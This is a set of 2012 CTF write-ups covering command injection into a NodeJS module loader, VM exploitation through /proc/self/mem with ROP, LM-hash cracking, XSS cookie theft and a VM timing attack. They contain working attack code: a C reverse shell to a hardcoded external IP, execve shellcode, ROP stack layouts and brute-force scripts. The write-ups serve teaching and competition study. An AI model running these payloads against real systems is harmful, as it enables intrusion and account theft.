• # CSAW CTF 2012: Web 500 writeup

Written by Pierre Bourdon
2012-10-01 00:00:00

Web 500 was a webpage with a small UI sending AJAX commands to a backend. These commands were either some UNIX commands (uname -a, uptime, ...) or something that looked like a heartbeat check for an external service.

Our first idea was obviously to inject UNIX commands but the backend seemed to have a very restrictive whitelist, allowing only the commands that were exposed by the UI and nothing else (not even adding options to the commands worked).

The heartbeat check sent a JSON command which looked like this:

 1 2 3 4 { "message": "extenderp", "extenderpurl": "http://127.0.0.1:8080/test/extenderptest.node" } 

It turns out we can download this extenderptest.node file from the web server using the same URL. It was a simple NodeJS C++ module exporting a single test function which returned a string. This lead us to think the extenderp message actually downloaded the NodeJS module from the URL and executed its test module. We checked if the extenderpurl could point to the external world, and sure enough the web server tried to download a file from our server!

The last step was then to write a NodeJS module which allowed us to get the key from the server. I choose to implement a fork/connect/dup2/execve exploit in the test function:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 #include #include #include #include #include #include #include using namespace node; using namespace v8; extern "C" { static Handle test(const Arguments& args) { if (!fork()) { int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); struct sockaddr_in connaddr; memset(&connaddr, 0, sizeof (connaddr)); connaddr.sin_family = AF_INET; connaddr.sin_addr.s_addr = inet_addr("176.9.97.190"); connaddr.sin_port = htons(12345); connect(fd, (sockaddr*)&connaddr, sizeof (connaddr)); dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); char* argv[] = { "/bin/sh", NULL }; execve("/bin/sh", argv, NULL); exit(0); } v8::HandleScope scope; return v8::String::New("Connectback should have happened"); } static void init(Handle

We uploaded that NodeJS module and used the extenderp command to get it to be run on the server, which worked very well! We were able to get shell access on the server and find the key for this challenge.

• # More fun with the NDH2k12 Prequals VM

Written by Pierre Bourdon and Samuel Chevet
2012-03-28 13:45:00

During the Nuit du Hack 2012 Prequals contest, we often had to remote exploit some services running in a custom VM (which was recently released on github). After injecting a shellcode in the services (through a remote stack buffer overflow) we were able to run VM code, which can execute interesting syscalls: read, write, open, exit, and a lot more. However there was not a way to directly execute a random x86 binary or to list directories (no getdents), which made it really hard to explore the server filesystem.

After the event ended we got an idea that we could have used to bypass this security and execute any shell command line on the remote server. Using /proc/self/cmdline, we can get the path to the VM binary and download it. Then, using /proc/self/mem we can replace some symbols from the binary by our custom x86 code. This method works because without the grsecurity patchset /proc/self/mem completely overrides NX and allows writing to read-only memory locations (like .text).

We wrote an exploit for exploit-me2.ndh which does the following thing:

• First, exploit the buffer overflow by sending a 102 chars string which will fill up the 100 bytes buffer and overwrite the stack pointer by the buffer start address. The buffer contains a shellcode which will load a second stage shellcode to memory. We had to do that because our main shellcode is bigger than 100 bytes. This VM code is loaded at offset 0x7800, below pie_base to avoid crashing the VM.
• Then, the second stage exploit opens /proc/self/mem, seeks to the op_end symbol location (VM instruction handler for END (0x1C)) and writes an x86_64 execve("/bin/sh") shellcode at this location. Seeking is not an easy task though as we can only manipulate 16 bits values inside the VM. Luckily the VM .text is at a very low address and we were able to use this at our advantage: for example, to seek to 0x4091bc, we do a loop to seek forward 0xFFFF 64 times then seek forward once more by 0x91fc. After our shellcode replaced the end instruction, we execute the 0x1C opcode to run our code.

Here is the second stage shellcode asm (first stage is really not that interesting):

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 ; Open /proc/self/mem movb r0, #0x02 movl r1, #str movb r2, #0x02 syscall mov r1, r0 movb r0, #0x11 ; SYS_seek movb r2, #0x0 ; offset movb r3, #0x0 ; SEEK_SET syscall ; Seek to 0x40 * 0xFFFF = 0x3fffc0 movl r2, #0xFFFF; offset movb r3, #0x1 ; SEEK_CUR movb r5, #0x40 loop: movb r0, #0x11 ; SYS_seek syscall dec r5 test r5, r5 jnz loop ; Seek forward to 0x4091bc == 0x40 * 0xFFFF + 0x91fc movb r0, #0x11 movl r2, #0x91fc syscall ; Write NULL to the address movb r0, #0x04 movl r2, #shellcode movb r3, #0x21 syscall end ; PWNZORED str: .asciz "/proc/self/mem" shellcode: 4831d248bbff2f62696e2f736848c1eb08534889e74831c050574889e6b03b0f05 

This exploit works fine when the VM allows execution of writable pages (NX not enabled). exploit-me2.ndh does not uses NX so this exploit works fine to exploit this binary. However, we were interested to see if we could reproduce this exploit on an NX enabled binary, like web3.ndh.

The difficulty here is that you obviously can't simply write your VM shellcode to memory and run it. You need to use ROP technics to run the code you want. The web3.ndh binary contains a lot of interesting functions and gadgets to ROP to so this was not as hard as expected.

This binary reads a 1020 bytes buffer, which is definitely enough for a simple shellcode but not enough for our ROP shellcode which can't easily do loops. This time again we built a two stage exploit: first stage does part of the job and calls read(2) to load a second stage which does the rest of the work.

We built our first stage exploit stack like this:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 7BF4 /proc/self/mem # required string constant ... padding ... 7DF4 0xBEEF # /GS canary 7DF6 0x8198 # offset to POP R1; POP R0; RET 7DF8 0x0002 # O_RDWR 7DFA 0x7BF4 # offset to /proc/self/mem 7DFC 0x81CA # "open" function 7DFE 0x8174 # offset to POP R2; POP R1; RET 7E00 0x0000 # SEEK_SET 7E02 0x0000 # seek to 0 7E04 0x81EA # "seek" function [repeated 0x28 times] 0x82C4 # offset to POP R2; RET 0xFFFF # seek 0xFFFF forward 0x80FF # offset to POP R3; RET 0x0001 # SEEK_CUR 0x81F9 # "lseek" function + 0xF to preserve regs 0x4242 # dummy for a POP in lseek 7FE6 0x84ED # "receive data" function 7FE8 0xFFFF # padding 7FEA 0xFFFF # padding 

This does 0x28 / 0x40 of the required seeks, then recalls the vulnerable data receive function to load the second stage stack which is placed just after on stdin:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 7BE0 0xFFFF # padding 7BE2 0xFFFF # padding 7BE4 [x86_64 execve(/bin/sh) shellcode + padding] 7DE4 0xBEEF # /GS canary 7DE6 0x8176 # offset to POP R1; RET 7DE8 0x0003 # hardcoded /proc/self/mem fd (haxx) [repeated 0x18 times] 0x82C4 # offset to POP R2; RET 0xFFFF # seek 0xFFFF forward 0x80FF # offset to POP R3; RET 0x0001 # SEEK_CUR 0x81F9 # "lseek" function + 0xF to preserve regs 0x4242 # dummy for a POP in lseek 7F0A 0x82C4 # POP R2; RET 7F0C 0x91FC # last required offset 7F0E 0x80FF # POP R3; RET 7F10 0x0001 # SEEK_CUR 7F12 0x81F9 # "lseek" + 0xF 7F14 0x4242 # dummy for a POP in lseek 7F16 0x82C4 # POP R2; RET 7F18 0x7BE4 # offset to shellcode 7F1A 0x80FF # POP R3; RET 7F1C 0x0021 # shellcode length 7F1E 0x8193 # "write" syscall in the middle of a function 7F20 0x4242 # dummy for a POP 7F22 0x4242 # dummy for a POP 7F24 0x838c # offset to END, which executes our x86 expl ... padding ... 7FE0 [shell command to execute] 

Last step is to be able to bypass ASLR + NX. We weren't able to do this yet, but we are confident that we could do it with some more work.

/proc/self/mem is really a powerful attack vector when you have to bypass things like NX on a vanilla kernel!

• # Hack.lu CTF 2012: Zombies PPTP (450 points)

Written by Pierre Bourdon
2012-10-25 11:00:00

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 Our intel shows us that the Zombies use a MS-PPTP like protocol and luckily we could intercept a challenge-response transmission of one of the Zombie outposts. The important thing for Zombies in this war is mass! Not only brain mass but their mass. So they built their PPTP protocol compatible to all older Zombie soldiers. Luckily our science team could extract the algorithm of the challenge-response system out of a captured Zombie brain â€¦ I spare you the details, let's just say it was not a pretty sight. And here comes your part soldier: we need the password of this intercepted transmission. With this password we were finally able to turn this war to our favor. So move your ass soldier and good luck! https://ctf.fluxfingers.net/challenges/pptp.tar.gz credits: 450 +3 (1st), +2 (2nd), +1 (3rd) 

The given tarball contains two important things: a Python script implementing two challenge/response algorithms for authentication, and a PCAP dump showing this TCP transmission between two hosts:

 1 2 3 4 5 6 start_pptp 200 Ok dead234a1f13beef 200 41787c9f6ffde56919ca3cd8d8944590a9fff68468e2bcb6 incompatible 200 78165eccbf53cdb11085e8e5e3626ba9bdefd5e9de62ce91 

In the Python script, the two algorithms are named response_newTechnologie and response_lm. From the network dump, we can assume that the first hash sent by the client is from response_newTechnologie: the server answered it was incompatible, so the client tried the older method and sent the second hash, generated with response_lm. The older method is probably more buggy, so let's work on it first. Here is the implementation:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 def lm_hash(self, input_password): # only use the first 14 bytes input_password = input_password[0:14] # convert all characters to uppercase chars input_password = input_password.upper() # split given password in two parts via 8 bytes password_part1 = input_password[0:8] # concat two 0 bytes to reach 8 bytes password_part2 = input_password[8:14] + "\0\0" # hash part 1 part1_des = des(password_part1) hash_part1 = part1_des.encrypt(self.constant) # hash part 2 part2_des = des(password_part2) hash_part2 = part2_des.encrypt(self.constant) # concat hash parts output_hash = hash_part1 + hash_part2 # return hash as hex value return binascii.hexlify(output_hash) def response_lm(self, challenge, password): # generate lm_hash for response password_hash = self.lm_hash(password) if len(challenge) != 16: raise ValueError("Challenge has to be 8 byte hex value.") # create three passwords for the response password_res1 = password_hash[0:16] password_res2 = password_hash[12:28] password_res3 = password_hash[28:32] + "000000000000" # response part 1 part1_des = des(binascii.unhexlify(password_res1)) res_part1 = part1_des.encrypt(binascii.unhexlify(challenge)) # response part 2 part2_des = des(binascii.unhexlify(password_res2)) res_part2 = part2_des.encrypt(binascii.unhexlify(challenge)) # response part 3 part3_des = des(binascii.unhexlify(password_res3)) res_part3 = part3_des.encrypt(binascii.unhexlify(challenge)) # create full response and return response = res_part1 + res_part2 + res_part3 return binascii.hexlify(response) 

Having worked a lot with MSCHAPv2 in the past, I found this algorithm very similar to MSCHAPv2 but using 2 LM hashes instead of a NTLM hash. The first vulnerability, which is common to MSCHAPv2, is that the third part of the response only uses two variable bytes: the key of the DES algorithm for part 3 always ends with 6 NUL bytes. We can bruteforce these two bytes very easily (65536 DES computations are done in less than 0.1s on a modern computer) and get part of the LM hash of the password. Unfortunately, that is not very useful in this case: the password is too long to bruteforce the whole LM hash, so we can't do anything with these two bytes.

The second vulnerability is that the key space for the first part of the LM hash is very reduced. First, the input password is converted to uppercase. If we assume that only alphabetical characters are present, that leaves us with only 26^8 (208 billions) possible keys. Still a lot, but manageable on a GPU in several hours. However, we're in a contest, we can't reimplement a GPU cracker and wait, we want the breakthrough bonus points!

The third vulnerability is that DES takes an 8 character input as the key, but actually only uses 56 bits of that input, discarding the LSB of each character. This means that on the 26 possible alphabetical characters, only 13 need to be tested: the other 13 share the same high 7 bits. This reduces the key space to 13^8 (815 millions) possible keys, which can easily be tested with a simple C program on a CPU.

The last thing we need is a way to check if the first 8 characters of the passwords match the ones used to generate the hash. If they match, the first part of the LM hash (first 64 bits) will be identical. This means the first part of the response will use an identical key, and because the challenge is constant that implies the first part of the response will be identical. Our bruteforce algorithm is the following:

 1 2 3 For each 8 chars password using charset (EAOISCMWGYKQZ) if DES(challenge, DES("Trololol", password)) == 78165eccbf53cdb1 found 

And here is a C implementation that finds the first 8 characters of the password, in uppercase, with an unknown LSB, in about 5 minutes on my laptop:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 #define CONSTANT "Trololol" #define CHALLENGE "\xde\xad\x23\x4a\x1f\x13\xbe\xef" #define WANTED "x\x16^\xcc\xbfS\xcd\xb1" #define CHARSET "EAOISCMWGYKQZ" #define CHARSETSIZE ((unsigned long)(sizeof (CHARSET))) #define CHARSETSIZE2 ((CHARSETSIZE)*(CHARSETSIZE)) #define CHARSETSIZE4 ((CHARSETSIZE2)*(CHARSETSIZE2)) #define CHARSETSIZE8 ((CHARSETSIZE4)*(CHARSETSIZE4)) #define NSTEPS CHARSETSIZE8 static void build_key(int step, char* buffer) { int idx[8]; for (int i = 0; i < 8; ++i) { idx[i] = step % CHARSETSIZE; step /= CHARSETSIZE; } for (int i = 0; i < 8; ++i) for (int j = 0; j < 8; ++j) buffer[i*8 + j] = (CHARSET[idx[i]] >> (7 - j)) & 1; } int main(void) { char bf_key[64]; char res_key[64]; char final_res[64]; char constant_bits[64]; char challenge_bits[64]; char wanted_bits[64]; for (int i = 0; i < 8; ++i) for (int j = 7; j >= 0; --j) { constant_bits[i * 8 + (7 - j)] = (CONSTANT[i] >> j) & 1; challenge_bits[i * 8 + (7 - j)] = (CHALLENGE[i] >> j) & 1; wanted_bits[i * 8 + (7 - j)] = (WANTED[i] >> j) & 1; } for (int step = 0; step < NSTEPS; ++step) { memcpy(res_key, constant_bits, 64); memcpy(final_res, challenge_bits, 64); build_key(step, bf_key); setkey(bf_key); encrypt(res_key, 0); setkey(res_key); encrypt(final_res, 0); if (!memcmp(final_res, wanted_bits, 64)) { printf("Found: %d\n", step); return 0; } if ((step % 1000000) == 0) printf("Current step: %d\n", step); } return 0; } 

According to this, the first 8 chars are (approximately): "ZOMCIESA". Now we can use about the same code to bruteforce the last 6 chars. We just need to be careful to use the right part of the hash to generate the second part of the response. The C code is not very different, so I will just skip this and post the second part: "EOSEMS". We can easily check if our answer is valid:

 1 2 >>> PPTP().response_lm('dead234a1f13beef', 'ZOMCIESAEOSEMS') '78165eccbf53cdb11085e8e5e3626ba9bdefd5e9de62ce91' 

The hash is exactly the same. Win! However, this is not the key yet: remember that we divided our key space by 4: we only considered uppercase characters (where we should have considered upper and lowercase), and only characters with the LSB equal to 1 (because DES ignored that bit anyway). To get the real password, we can just bruteforce the 4^14 (268 millions) different possibilities using the new technologie hash, which does not lose informations. Here is the script we used, with a small hack to hardcode that the key starts with "ZOMBIES" (this can be deduced easily by a human):

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import pptp for i in xrange(2**7 * 4**7): n1 = i / 128 n2 = i % 128 s1 = 'ZOMBIES' s2 = s1.lower() s = '' for j in xrange(7): if n2 & 1: s += s1[j] else: s += s2[j] n2 >>= 1 s1 = 'AEOSEMS' s2 = '@DNRDLR' s3 = s1.lower() s4 = s2.lower() for j in xrange(7): l = [s1, s2, s3, s4] s += l[n1 & 3][j] n1 >>= 2 x = pptp.PPTP() if x.response_newTechnologie('dead234a1f13beef', s) == '41787c9f6ffde56919ca3cd8d8944590a9fff68468e2bcb6': print s if (i % 100000) == 0: print i 

After one or two minutes of computation (<3 PyPy), we get the real key that we can submit on the website: ZomBIEsAdOReMS.

• # CSAW CTF 2012: Web 400 writeup

Written by Pierre Bourdon
2012-10-01 00:00:00

Note: this article uses MathJax to display formulas written in TeX. Please enable Javascript in order to see the formulas correctly.

Web 400 was an interesting challenge involving web exploits as well as crypto. We had access to a web application which allowed sending messages from a user to another. The twist is that all of these messages were encrypted using an unknown algorithm. When sending a message the user provides a key which is used to encrypt the message.

After analyzing the algorithm a bit (same key and message, trying different key sizes and block sizes, checking if every block is encrypted the same, etc.) we found out that it was some kind of ECB XOR using the key + a constant 64 bits value. This was only true for the first few blocks though: after that another key or another constant value was used. As we'll soon see, this does not matter a lot.

We were able to confirm that this message system is vulnerable to XSS attacks by sending some strings that give HTML tags when encrypted. We just need to encode a cookie stealer and send it to the admin user to gain access to his account.

Now that we know this algorithm uses XOR as its main operation, we can use a very interesting property of this binary operator:

$$Plain \oplus Key = Cipher \Leftrightarrow Plain \oplus Cipher = Key$$

If we send a block using a plaintext P1 and it gives us C1, we can use that property to deduce what we should send to have C2 be what we want:

$$P2 = C2 \oplus Key \Rightarrow P2 = C2 \oplus (P1 \oplus C1)$$

It turns out we can't use that for a whole message because the key seems to depend on the previous blocks plaintexts. We had to construct the message block per block using that technic. When encrypted, our message is:

 1  

We sent that to the admin and got his session ID transmitted to our server. Using that we were able to login to his account and find some encrypted messages (and their associated key). The first message had a plaintext key when decrypted gave us another encryption key, which we used to decrypt a second message, giving us the final key we had to submit on the CTF website.

• # PlaidCTF 2012 "simple" writeup

Written by Pierre Bourdon
2012-04-30 13:05:00

simple is a binary that waits for a string on stdin and returns whether the input was the valid key or not. It does that in a very interesting way: there are only 112 bytes of executable x86 code in this 45K binary. After a bit of static analysis in IDA we found out that these 112 bytes implement a common One Instruction Set Computer virtual machine for the subleq architecture with two very simple twists.

A subleq computer works in a very simple way: only one instruction can be executed: subleq a, b, c (with a, b and c three addresses). This instruction computes *b = *b - *a then jumps to c if *b <= 0.

The binary starts by loading 0x323ac into the esp register, then for each iteration of the loop pops 3 values from the stack. This is the "fetch" state of the virtual machine. After that, a normal subleq computer would simply execute a substraction and a conditional jump. Here, the VM starts by checking if a is an invalid address (less than 0). If it is, it executes a read syscall to read a single character to *b. Then, it checks if b is an invalid address. If it is, it executes a write syscall to write a single character from *a. Then if both addresses are valid it executes a standard subleq.

We started to reverse the whole bytecode for that virtual machine, but reversing something made of several thousands of identical instructions is really hard and we weren't really able to find anything interesting through static analysis.

We then tried to combine static and dynamic analysis by tracing the bytecode to see which instructions were executed and in which order. Using gdb and breaking on the first instruction of the VM loop, it is easy to get the address of the current instruction. When we were reading some traces we noticed that the bytecode was (obviously) doing loops: to read characters until a newline, but also probably to check if the input string is valid. That means that we can actually count how much loop iterations were performed for our input by counting how much instructions were executed. This is basically a timing attack applied to a virtual machine.

We used this to bruteforce the input string one character by one character using the charset [a-zA-Z0-9_-]. For each character added to the input we counted the number of instructions the VM executed and noticed that this number varied slightly:

 1 2 3 4 5 6 7 8 9 trying key 'h'... 2997 trying key 'i'... 2997 trying key 'j'... 2997 trying key 'k'... 2997 trying key 'l'... 2977 trying key 'm'... 2993 trying key 'n'... 2993 trying key 'o'... 2993 trying key 'p'... 2993 

The character l had a lower count and every character after it was slightly lower than characters before it. We assumed that it was because it was a valid first character. We then bruteforced all the other characters before getting to the final solution of this problem:

  1 2 3 4 5 6 7 8 9 10 11 trying key 'l3ss_1s_m0r3z'... 12309 trying key 'l3ss_1s_m0r3_'... 12309 trying key 'l3ss_1s_m0r3-'... 12309 trying key 'l3ss_1s_m0r3!'... 14559 trying key 'l3ss_1s_m0r30'... 12309 trying key 'l3ss_1s_m0r31'... 12309 trying key 'l3ss_1s_m0r32'... 12309 $./simple l3ss_1s_m0r3! Key: l3ss_1s_m0r3!  Here is the script we used to bruteforce the key character by character:   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 #! /bin/sh current_guess="$1" charset="a b c d e f g h i j k l m n o p q r s t u v w x y z" charset="$charset _ - ! 0 1 2 3 4 5 6 7 8 9" # Simple GDB script: disable the paging with "set height 0", then define a # recursive function which prints "instr" and continues to the next breakpoint. # GDB has a recursion limit so we have to execute "countinstrs" several times :/ cat > gdbscript < guess echo -n "trying key '$guess'... " gdb ./simple < gdbscript 2>&1 \ | grep '^\$.*= "instr"$' \ | tail -1 \ | cut -d ' ' -f 1 \ | cut -c 2- done `